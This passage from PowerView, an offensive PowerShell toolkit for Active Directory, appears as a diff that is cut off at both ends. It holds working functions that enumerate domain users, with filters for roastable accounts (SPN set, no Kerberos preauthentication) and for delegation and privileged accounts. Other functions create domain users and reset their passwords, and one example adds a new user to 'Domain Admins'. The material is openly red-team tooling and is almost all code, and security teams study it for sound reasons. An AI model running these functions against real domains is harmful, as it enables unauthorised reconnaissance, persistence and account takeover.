Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: Get-Domain, Get-DomainUser, Get-DomainGroup, Get-DomainComputer + +.DESCRIPTION + +A 'reference' set of property names is calculated, either from a standard set preserved +for user/group/computers, or from the array of names passed to -ReferencePropertySet, or +from the property names of the passed -ReferenceObject. Every user/group/computer object +(depending on determined class) are enumerated, and for each object, if the object has a +'non-standard' property set (meaning a property not held by the reference set), the object's +samAccountName, property name, and property value are output to the pipeline. + +.PARAMETER ClassName + +Specifies the AD object class to find property outliers for, 'user', 'group', or 'computer'. +If -ReferenceObject is specified, this will be automatically extracted, if possible. + +.PARAMETER ReferencePropertySet + +Specifies an array of property names to diff against the class schema. + +.PARAMETER ReferenceObject + +Specicifes the PowerView user/group/computer object to extract property names +from to use as the reference set. + +.PARAMETER Domain + +Specifies the domain to use for the query, defaults to the current domain. + +.PARAMETER LDAPFilter + +Specifies an LDAP query string that is used to filter Active Directory objects. + +.PARAMETER SearchBase + +The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to. + +.PARAMETER SearchScope + +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +.PARAMETER ResultPageSize + +Specifies the PageSize to set for the LDAP searcher object. + +.PARAMETER ServerTimeLimit + +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. + +.PARAMETER Tombstone + +Switch. Specifies that the searcher should also return deleted/tombstoned objects. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.EXAMPLE + +Find-DomainObjectPropertyOutlier -ClassName 'User' + +Enumerates users in the current domain with 'outlier' properties filled in. + +.EXAMPLE + +Find-DomainObjectPropertyOutlier -ClassName 'Group' -Domain external.local + +Enumerates groups in the external.local forest/domain with 'outlier' properties filled in. + +.EXAMPLE + +Get-DomainComputer -FindOne | Find-DomainObjectPropertyOutlier + +Enumerates computers in the current domain with 'outlier' properties filled in. + +.OUTPUTS + +PowerView.PropertyOutlier + +Custom PSObject with translated object property outliers. +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerView.PropertyOutlier')] + [CmdletBinding(DefaultParameterSetName = 'ClassName')] + Param( + [Parameter(Position = 0, Mandatory = $True, ParameterSetName = 'ClassName')] + [Alias('Class')] + [ValidateSet('User', 'Group', 'Computer')] + [String] + $ClassName, + + [ValidateNotNullOrEmpty()] + [String[]] + $ReferencePropertySet, + + [Parameter(ValueFromPipeline = $True, Mandatory = $True, ParameterSetName = 'ReferenceObject')] + [PSCustomObject] + $ReferenceObject, + + [ValidateNotNullOrEmpty()] + [String] + $Domain, + + [ValidateNotNullOrEmpty()] + [Alias('Filter')] + [String] + $LDAPFilter, + + [ValidateNotNullOrEmpty()] + [Alias('ADSPath')] + [String] + $SearchBase, + + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [ValidateSet('Base', 'OneLevel', 'Subtree')] + [String] + $SearchScope = 'Subtree', + + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, + + [Switch] + $Tombstone, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + BEGIN { + $UserReferencePropertySet = @('admincount','accountexpires','badpasswordtime','badpwdcount','cn','codepage','countrycode','description', 'displayname','distinguishedname','dscorepropagationdata','givenname','instancetype','iscriticalsystemobject','lastlogoff','lastlogon','lastlogontimestamp','lockouttime','logoncount','memberof','msds-supportedencryptiontypes','name','objectcategory','objectclass','objectguid','objectsid','primarygroupid','pwdlastset','samaccountname','samaccounttype','sn','useraccountcontrol','userprincipalname','usnchanged','usncreated','whenchanged','whencreated') + + $GroupReferencePropertySet = @('admincount','cn','description','distinguishedname','dscorepropagationdata','grouptype','instancetype','iscriticalsystemobject','member','memberof','name','objectcategory','objectclass','objectguid','objectsid','samaccountname','samaccounttype','systemflags','usnchanged','usncreated','whenchanged','whencreated') + + $ComputerReferencePropertySet = @('accountexpires','badpasswordtime','badpwdcount','cn','codepage','countrycode','distinguishedname','dnshostname','dscorepropagationdata','instancetype','iscriticalsystemobject','lastlogoff','lastlogon','lastlogontimestamp','localpolicyflags','logoncount','msds-supportedencryptiontypes','name','objectcategory','objectclass','objectguid','objectsid','operatingsystem','operatingsystemservicepack','operatingsystemversion','primarygroupid','pwdlastset','samaccountname','samaccounttype','serviceprincipalname','useraccountcontrol','usnchanged','usncreated','whenchanged','whencreated') + + $SearcherArguments = @{} + if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain } + if ($PSBoundParameters['LDAPFilter']) { $SearcherArguments['LDAPFilter'] = $LDAPFilter } + if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase } + if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential } + + # Domain / Credential + if ($PSBoundParameters['Domain']) { + if ($PSBoundParameters['Credential']) { + $TargetForest = Get-Domain -Domain $Domain | Select-Object -ExpandProperty Forest | Select-Object -ExpandProperty Name + } + else { + $TargetForest = Get-Domain -Domain $Domain -Credential $Credential | Select-Object -ExpandProperty Forest | Select-Object -ExpandProperty Name + } + Write-Verbose "[Find-DomainObjectPropertyOutlier] Enumerated forest '$TargetForest' for target domain '$Domain'" + } + + $SchemaArguments = @{} + if ($PSBoundParameters['Credential']) { $SchemaArguments['Credential'] = $Credential } + if ($TargetForest) { + $SchemaArguments['Forest'] = $TargetForest + } + } + + PROCESS { + + if ($PSBoundParameters['ReferencePropertySet']) { + Write-Verbose "[Find-DomainObjectPropertyOutlier] Using specified -ReferencePropertySet" + $ReferenceObjectProperties = $ReferencePropertySet + } + elseif ($PSBoundParameters['ReferenceObject']) { + Write-Verbose "[Find-DomainObjectPropertyOutlier] Extracting property names from -ReferenceObject to use as the reference property set" + $ReferenceObjectProperties = Get-Member -InputObject $ReferenceObject -MemberType NoteProperty | Select-Object -Expand Name + $ReferenceObjectClass = $ReferenceObject.objectclass | Select-Object -Last 1 + Write-Verbose "[Find-DomainObjectPropertyOutlier] Calculated ReferenceObjectClass : $ReferenceObjectClass" + } + else { + Write-Verbose "[Find-DomainObjectPropertyOutlier] Using the default reference property set for the object class '$ClassName'" + } + + if (($ClassName -eq 'User') -or ($ReferenceObjectClass -eq 'User')) { + $Objects = Get-DomainUser @SearcherArguments + if (-not $ReferenceObjectProperties) { + $ReferenceObjectProperties = $UserReferencePropertySet + } + } + elseif (($ClassName -eq 'Group') -or ($ReferenceObjectClass -eq 'Group')) { + $Objects = Get-DomainGroup @SearcherArguments + if (-not $ReferenceObjectProperties) { + $ReferenceObjectProperties = $GroupReferencePropertySet + } + } + elseif (($ClassName -eq 'Computer') -or ($ReferenceObjectClass -eq 'Computer')) { + $Objects = Get-DomainComputer @SearcherArguments + if (-not $ReferenceObjectProperties) { + $ReferenceObjectProperties = $ComputerReferencePropertySet + } + } + else { + throw "[Find-DomainObjectPropertyOutlier] Invalid class: $ClassName" + } + + ForEach ($Object in $Objects) { + $ObjectProperties = Get-Member -InputObject $Object -MemberType NoteProperty | Select-Object -Expand Name + ForEach($ObjectProperty in $ObjectProperties) { + if ($ReferenceObjectProperties -NotContains $ObjectProperty) { + $Out = New-Object PSObject + $Out | Add-Member Noteproperty 'SamAccountName' $Object.SamAccountName + $Out | Add-Member Noteproperty 'Property' $ObjectProperty + $Out | Add-Member Noteproperty 'Value' $Object.$ObjectProperty + $Out.PSObject.TypeNames.Insert(0, 'PowerView.PropertyOutlier') + $Out + } + } + } + } +} + + +######################################################## +# +# "net *" replacements and other fun start below +# +######################################################## + +function Get-DomainUser { +<# +.SYNOPSIS + +Return all users or specific user objects in AD. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainSearcher, Convert-ADName, Convert-LDAPProperty + +.DESCRIPTION + +Builds a directory searcher object using Get-DomainSearcher, builds a custom +LDAP filter based on targeting/filter parameters, and searches for all objects +matching the criteria. To only return specific properties, use +"-Properties samaccountname,usnchanged,...". By default, all user objects for +the current domain are returned. + +.PARAMETER Identity + +A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local), +SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201). +Wildcards accepted. Also accepts DOMAIN\user format. + +.PARAMETER SPN + +Switch. Only return user objects with non-null service principal names. + +.PARAMETER UACFilter + +Dynamic parameter that accepts one or more values from $UACEnum, including +"NOT_X" negation forms. To see all possible values, run '0|ConvertFrom-UACValue -ShowAll'. + +.PARAMETER AdminCount + +Switch. Return users with '(adminCount=1)' (meaning are/were privileged). + +.PARAMETER AllowDelegation + +Switch. Return user accounts that are not marked as 'sensitive and not allowed for delegation' + +.PARAMETER DisallowDelegation + +Switch. Return user accounts that are marked as 'sensitive and not allowed for delegation' + +.PARAMETER TrustedToAuth + +Switch. Return computer objects that are trusted to authenticate for other principals. + +.PARAMETER PreauthNotRequired + +Switch. Return user accounts with "Do not require Kerberos preauthentication" set. + +.PARAMETER Domain + +Specifies the domain to use for the query, defaults to the current domain. + +.PARAMETER LDAPFilter + +Specifies an LDAP query string that is used to filter Active Directory objects. + +.PARAMETER Properties + +Specifies the properties of the output object to retrieve from the server. + +.PARAMETER SearchBase + +The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to. + +.PARAMETER SearchScope + +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +.PARAMETER ResultPageSize + +Specifies the PageSize to set for the LDAP searcher object. + +.PARAMETER ServerTimeLimit + +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. + +.PARAMETER SecurityMasks + +Specifies an option for examining security information of a directory object. +One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'. + +.PARAMETER Tombstone + +Switch. Specifies that the searcher should also return deleted/tombstoned objects. + +.PARAMETER FindOne + +Only return one result object. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.PARAMETER Raw + +Switch. Return raw results instead of translating the fields into a custom PSObject. + +.EXAMPLE + +Get-DomainUser -Domain testlab.local + +Return all users for the testlab.local domain + +.EXAMPLE + +Get-DomainUser "S-1-5-21-890171859-3433809279-3366196753-1108","administrator" + +Return the user with the given SID, as well as Administrator. + +.EXAMPLE + +'S-1-5-21-890171859-3433809279-3366196753-1114', 'CN=dfm,CN=Users,DC=testlab,DC=local','4c435dd7-dc58-4b14-9a5e-1fdb0e80d201','administrator' | Get-DomainUser -Properties samaccountname,lastlogoff + +lastlogoff samaccountname +---------- -------------- +12/31/1600 4:00:00 PM dfm.a +12/31/1600 4:00:00 PM dfm +12/31/1600 4:00:00 PM harmj0y +12/31/1600 4:00:00 PM Administrator + +.EXAMPLE + +Get-DomainUser -SearchBase "LDAP://OU=secret,DC=testlab,DC=local" -AdminCount -AllowDelegation + +Search the specified OU for privileged user (AdminCount = 1) that allow delegation + +.EXAMPLE + +Get-DomainUser -LDAPFilter '(!primarygroupid=513)' -Properties samaccountname,lastlogon + +Search for users with a primary group ID other than 513 ('domain users') and only return samaccountname and lastlogon + +.EXAMPLE + +Get-DomainUser -UACFilter DONT_REQ_PREAUTH,NOT_PASSWORD_EXPIRED + +Find users who doesn't require Kerberos preauthentication and DON'T have an expired password. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainUser -Credential $Cred + +.EXAMPLE + +Get-Domain | Select-Object -Expand name +testlab.local + +Get-DomainUser dev\user1 -Verbose -Properties distinguishedname +VERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local +VERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=dev,DC=testlab,DC=local +VERBOSE: [Get-DomainUser] filter string: (&(samAccountType=805306368)(|(samAccountName=user1))) + +distinguishedname +----------------- +CN=user1,CN=Users,DC=dev,DC=testlab,DC=local + +.INPUTS + +String + +.OUTPUTS + +PowerView.User + +Custom PSObject with translated user property fields. + +PowerView.User.Raw + +The raw DirectoryServices.SearchResult object, if -Raw is enabled. +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerView.User')] + [OutputType('PowerView.User.Raw')] + [CmdletBinding(DefaultParameterSetName = 'AllowDelegation')] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('DistinguishedName', 'SamAccountName', 'Name', 'MemberDistinguishedName', 'MemberName')] + [String[]] + $Identity, + + [Switch] + $SPN, + + [Switch] + $AdminCount, + + [Parameter(ParameterSetName = 'AllowDelegation')] + [Switch] + $AllowDelegation, + + [Parameter(ParameterSetName = 'DisallowDelegation')] + [Switch] + $DisallowDelegation, + + [Switch] + $TrustedToAuth, + + [Alias('KerberosPreauthNotRequired', 'NoPreauth')] + [Switch] + $PreauthNotRequired, + + [ValidateNotNullOrEmpty()] + [String] + $Domain, + + [ValidateNotNullOrEmpty()] + [Alias('Filter')] + [String] + $LDAPFilter, + + [ValidateNotNullOrEmpty()] + [String[]] + $Properties, + + [ValidateNotNullOrEmpty()] + [Alias('ADSPath')] + [String] + $SearchBase, + + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [ValidateSet('Base', 'OneLevel', 'Subtree')] + [String] + $SearchScope = 'Subtree', + + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, + + [ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')] + [String] + $SecurityMasks, + + [Switch] + $Tombstone, + + [Alias('ReturnOne')] + [Switch] + $FindOne, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty, + + [Switch] + $Raw + ) + + DynamicParam { + $UACValueNames = [Enum]::GetNames($UACEnum) + # add in the negations + $UACValueNames = $UACValueNames | ForEach-Object {$_; "NOT_$_"} + # create new dynamic parameter + New-DynamicParameter -Name UACFilter -ValidateSet $UACValueNames -Type ([array]) + } + + BEGIN { + $SearcherArguments = @{} + if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain } + if ($PSBoundParameters['Properties']) { $SearcherArguments['Properties'] = $Properties } + if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase } + if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['SecurityMasks']) { $SearcherArguments['SecurityMasks'] = $SecurityMasks } + if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential } + $UserSearcher = Get-DomainSearcher @SearcherArguments + } + + PROCESS { + #bind dynamic parameter to a friendly variable + if ($PSBoundParameters -and ($PSBoundParameters.Count -ne 0)) { + New-DynamicParameter -CreateVariables -BoundParameters $PSBoundParameters + } + + if ($UserSearcher) { + $IdentityFilter = '' + $Filter = '' + $Identity | Where-Object {$_} | ForEach-Object { + $IdentityInstance = $_.Replace('(', '\28').Replace(')', '\29') + if ($IdentityInstance -match '^S-1-') { + $IdentityFilter += "(objectsid=$IdentityInstance)" + } + elseif ($IdentityInstance -match '^CN=') { + $IdentityFilter += "(distinguishedname=$IdentityInstance)" + if ((-not $PSBoundParameters['Domain']) -and (-not $PSBoundParameters['SearchBase'])) { + # if a -Domain isn't explicitly set, extract the object domain out of the distinguishedname + # and rebuild the domain searcher + $IdentityDomain = $IdentityInstance.SubString($IdentityInstance.IndexOf('DC=')) -replace 'DC=','' -replace ',','.' + Write-Verbose "[Get-DomainUser] Extracted domain '$IdentityDomain' from '$IdentityInstance'" + $SearcherArguments['Domain'] = $IdentityDomain + $UserSearcher = Get-DomainSearcher @SearcherArguments + if (-not $UserSearcher) { + Write-Warning "[Get-DomainUser] Unable to retrieve domain searcher for '$IdentityDomain'" + } + } + } + elseif ($IdentityInstance -imatch '^[0-9A-F]{8}-([0-9A-F]{4}-){3}[0-9A-F]{12}$') { + $GuidByteString = (([Guid]$IdentityInstance).ToByteArray() | ForEach-Object { '\' + $_.ToString('X2') }) -join '' + $IdentityFilter += "(objectguid=$GuidByteString)" + } + elseif ($IdentityInstance.Contains('\')) { + $ConvertedIdentityInstance = $IdentityInstance.Replace('\28', '(').Replace('\29', ')') | Convert-ADName -OutputType Canonical + if ($ConvertedIdentityInstance) { + $UserDomain = $ConvertedIdentityInstance.SubString(0, $ConvertedIdentityInstance.IndexOf('/')) + $UserName = $IdentityInstance.Split('\')[1] + $IdentityFilter += "(samAccountName=$UserName)" + $SearcherArguments['Domain'] = $UserDomain + Write-Verbose "[Get-DomainUser] Extracted domain '$UserDomain' from '$IdentityInstance'" + $UserSearcher = Get-DomainSearcher @SearcherArguments + } + } + else { + $IdentityFilter += "(samAccountName=$IdentityInstance)" + } + } + + if ($IdentityFilter -and ($IdentityFilter.Trim() -ne '') ) { + $Filter += "(|$IdentityFilter)" + } + + if ($PSBoundParameters['SPN']) { + Write-Verbose '[Get-DomainUser] Searching for non-null service principal names' + $Filter += '(servicePrincipalName=*)' + } + if ($PSBoundParameters['AllowDelegation']) { + Write-Verbose '[Get-DomainUser] Searching for users who can be delegated' + # negation of "Accounts that are sensitive and not trusted for delegation" + $Filter += '(!(userAccountControl:1.2.840.113556.1.4.803:=1048574))' + } + if ($PSBoundParameters['DisallowDelegation']) { + Write-Verbose '[Get-DomainUser] Searching for users who are sensitive and not trusted for delegation' + $Filter += '(userAccountControl:1.2.840.113556.1.4.803:=1048574)' + } + if ($PSBoundParameters['AdminCount']) { + Write-Verbose '[Get-DomainUser] Searching for adminCount=1' + $Filter += '(admincount=1)' + } + if ($PSBoundParameters['TrustedToAuth']) { + Write-Verbose '[Get-DomainUser] Searching for users that are trusted to authenticate for other principals' + $Filter += '(msds-allowedtodelegateto=*)' + } + if ($PSBoundParameters['PreauthNotRequired']) { + Write-Verbose '[Get-DomainUser] Searching for user accounts that do not require kerberos preauthenticate' + $Filter += '(userAccountControl:1.2.840.113556.1.4.803:=4194304)' + } + if ($PSBoundParameters['LDAPFilter']) { + Write-Verbose "[Get-DomainUser] Using additional LDAP filter: $LDAPFilter" + $Filter += "$LDAPFilter" + } + + # build the LDAP filter for the dynamic UAC filter value + $UACFilter | Where-Object {$_} | ForEach-Object { + if ($_ -match 'NOT_.*') { + $UACField = $_.Substring(4) + $UACValue = [Int]($UACEnum::$UACField) + $Filter += "(!(userAccountControl:1.2.840.113556.1.4.803:=$UACValue))" + } + else { + $UACValue = [Int]($UACEnum::$_) + $Filter += "(userAccountControl:1.2.840.113556.1.4.803:=$UACValue)" + } + } + + $UserSearcher.filter = "(&(samAccountType=805306368)$Filter)" + Write-Verbose "[Get-DomainUser] filter string: $($UserSearcher.filter)" + + if ($PSBoundParameters['FindOne']) { $Results = $UserSearcher.FindOne() } + else { $Results = $UserSearcher.FindAll() } + $Results | Where-Object {$_} | ForEach-Object { + if ($PSBoundParameters['Raw']) { + # return raw result objects + $User = $_ + $User.PSObject.TypeNames.Insert(0, 'PowerView.User.Raw') + } + else { + $User = Convert-LDAPProperty -Properties $_.Properties + $User.PSObject.TypeNames.Insert(0, 'PowerView.User') + } + $User + } + if ($Results) { + try { $Results.dispose() } + catch { + Write-Verbose "[Get-DomainUser] Error disposing of the Results object: $_" + } + } + $UserSearcher.dispose() + } + } +} + + +function New-DomainUser { +<# +.SYNOPSIS + +Creates a new domain user (assuming appropriate permissions) and returns the user object. + +TODO: implement all properties that New-ADUser implements (https://technet.microsoft.com/en-us/library/ee617253.aspx). + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-PrincipalContext + +.DESCRIPTION + +First binds to the specified domain context using Get-PrincipalContext. +The bound domain context is then used to create a new +DirectoryServices.AccountManagement.UserPrincipal with the specified user properties. + +.PARAMETER SamAccountName + +Specifies the Security Account Manager (SAM) account name of the user to create. +Maximum of 256 characters. Mandatory. + +.PARAMETER AccountPassword + +Specifies the password for the created user. Mandatory. + +.PARAMETER Name + +Specifies the name of the user to create. If not provided, defaults to SamAccountName. + +.PARAMETER DisplayName + +Specifies the display name of the user to create. If not provided, defaults to SamAccountName. + +.PARAMETER Description + +Specifies the description of the user to create. + +.PARAMETER Domain + +Specifies the domain to use to search for user/group principals, defaults to the current domain. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.EXAMPLE + +$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +New-DomainUser -SamAccountName harmj0y2 -Description 'This is harmj0y' -AccountPassword $UserPassword + +Creates the 'harmj0y2' user with the specified description and password. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$user = New-DomainUser -SamAccountName harmj0y2 -Description 'This is harmj0y' -AccountPassword $UserPassword -Credential $Cred + +Creates the 'harmj0y2' user with the specified description and password, using the specified +alternate credentials. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +New-DomainUser -SamAccountName andy -AccountPassword $UserPassword -Credential $Cred | Add-DomainGroupMember 'Domain Admins' -Credential $Cred + +Creates the 'andy' user with the specified description and password, using the specified +alternate credentials, and adds the user to 'domain admins' using Add-DomainGroupMember +and the alternate credentials. + +.OUTPUTS + +DirectoryServices.AccountManagement.UserPrincipal + +.LINK + +http://richardspowershellblog.wordpress.com/2008/05/25/system-directoryservices-accountmanagement/ +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('DirectoryServices.AccountManagement.UserPrincipal')] + Param( + [Parameter(Mandatory = $True)] + [ValidateLength(0, 256)] + [String] + $SamAccountName, + + [Parameter(Mandatory = $True)] + [ValidateNotNullOrEmpty()] + [Alias('Password')] + [Security.SecureString] + $AccountPassword, + + [ValidateNotNullOrEmpty()] + [String] + $Name, + + [ValidateNotNullOrEmpty()] + [String] + $DisplayName, + + [ValidateNotNullOrEmpty()] + [String] + $Description, + + [ValidateNotNullOrEmpty()] + [String] + $Domain, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + $ContextArguments = @{ + 'Identity' = $SamAccountName + } + if ($PSBoundParameters['Domain']) { $ContextArguments['Domain'] = $Domain } + if ($PSBoundParameters['Credential']) { $ContextArguments['Credential'] = $Credential } + $Context = Get-PrincipalContext @ContextArguments + + if ($Context) { + $User = New-Object -TypeName System.DirectoryServices.AccountManagement.UserPrincipal -ArgumentList ($Context.Context) + + # set all the appropriate user parameters + $User.SamAccountName = $Context.Identity + $TempCred = New-Object System.Management.Automation.PSCredential('a', $AccountPassword) + $User.SetPassword($TempCred.GetNetworkCredential().Password) + $User.Enabled = $True + $User.PasswordNotRequired = $False + + if ($PSBoundParameters['Name']) { + $User.Name = $Name + } + else { + $User.Name = $Context.Identity + } + if ($PSBoundParameters['DisplayName']) { + $User.DisplayName = $DisplayName + } + else { + $User.DisplayName = $Context.Identity + } + + if ($PSBoundParameters['Description']) { + $User.Description = $Description + } + + Write-Verbose "[New-DomainUser] Attempting to create user '$SamAccountName'" + try { + $Null = $User.Save() + Write-Verbose "[New-DomainUser] User '$SamAccountName' successfully created" + $User + } + catch { + Write-Warning "[New-DomainUser] Error creating user '$SamAccountName' : $_" + } + } +} + + +function Set-DomainUserPassword { +<# +.SYNOPSIS + +Sets the password for a given user identity. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-PrincipalContext + +.DESCRIPTION + +First binds to the specified domain context using Get-PrincipalContext. +The bound domain context is then used to search for the specified user -Identity, +which returns a DirectoryServices.AccountManagement.UserPrincipal object. The +SetPassword() function is then invoked on the user, setting the password to -AccountPassword. + +.PARAMETER Identity + +A user SamAccountName (e.g. User1), DistinguishedName (e.g. CN=user1,CN=Users,DC=testlab,DC=local), +SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1113), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201) +specifying the user to reset the password for. + +.PARAMETER AccountPassword + +Specifies the password to reset the target user's to. Mandatory. + +.PARAMETER Domain + +Specifies the domain to use to search for the user identity, defaults to the current domain. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.EXAMPLE + +$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +Set-DomainUserPassword -Identity andy -AccountPassword $UserPassword + +Resets the password for 'andy' to the password specified. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +Set-DomainUserPassword -Identity andy -AccountPassword $UserPassword -Credential $Cred + +Resets the password for 'andy' usering the alternate credentials specified. + +.OUTPUTS + +DirectoryServices.AccountManagement.UserPrincipal + +.LINK + +http://richardspowershellblog.wordpress.com/2008/05/25/system-directoryservices-accountmanagement/ +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('DirectoryServices.AccountManagement.UserPrincipal')] + Param( + [Parameter(Position = 0, Mandatory = $True)] + [Alias('UserName', 'UserIdentity', 'User')] + [String] + $Identity, + + [Parameter(Mandatory = $True)] + [ValidateNotNullOrEmpty()] + [Alias('Password')] + [Security.SecureString] + $AccountPassword, + + [ValidateNotNullOrEmpty()] + [String] + $Domain, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + $ContextArguments = @{ 'Identity' = $Identity } + if ($PSBoundParameters['Domain']) { $ContextArguments['Domain'] = $Domain } + if ($PSBoundParameters['Credential']) { $ContextArguments['Credential'] = $Credential } + $Context = Get-PrincipalContext @ContextArguments + + if ($Context) { + $User = [System.DirectoryServices.AccountManagement.UserPrincipal]::FindByIdentity($Context.Context, $Identity) + + if ($User) { + Write-Verbose "[Set-DomainUserPassword] Attempting to set the password for user '$Identity'" + try { + $TempCred = New-Object System.Management.Automation.PSCredential('a', $AccountPassword) + $User.SetPassword($TempCred.GetNetworkCredential().Password) + + $Null = $User.Save() + Write-Verbose "[Set-DomainUserPassword] Password for user '$Identity' successfully reset" + } + catch { + Write-Warning "[Set-DomainUserPassword] Error setting password for user '$Identity' : $_" + } + } + else { + Write-Warning "[Set-DomainUserPassword] Unable to find user '$Identity'" + } + } +} + + +function Get-DomainUserEvent { +<# +.SYNOPSIS + +Enumerate account logon events (ID 4624) and Logon with explicit credential +events (ID 4648) from the specified host (default of the localhost). + +Author: Lee Christensen (@tifkin_), Justin Warner (@sixdub), Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None + +.DESCRIPTION + +This function uses an XML path filter passed to Get-WinEvent to retrieve +security events with IDs of 4624 (logon events) or 4648 (explicit credential +logon events) from -StartTime (default of now-1 day) to -EndTime (default of now). +A maximum of -MaxEvents (default of 5000) are returned. + +.PARAMETER ComputerName + +Specifies the computer name to retrieve events from, default of localhost. + +.PARAMETER StartTime + +The [DateTime] object representing the start of when to collect events. +Default of [DateTime]::Now.AddDays(-1). + +.PARAMETER EndTime + +The [DateTime] object representing the end of when to collect events. +Default of [DateTime]::Now. + +.PARAMETER MaxEvents + +The maximum number of events to retrieve. Default of 5000. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target computer. + +.EXAMPLE + +Get-DomainUserEvent + +Return logon events on the local machine. + +.EXAMPLE + +Get-DomainController | Get-DomainUserEvent -StartTime ([DateTime]::Now.AddDays(-3)) + +Return all logon events from the last 3 days from every domain controller in the current domain. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 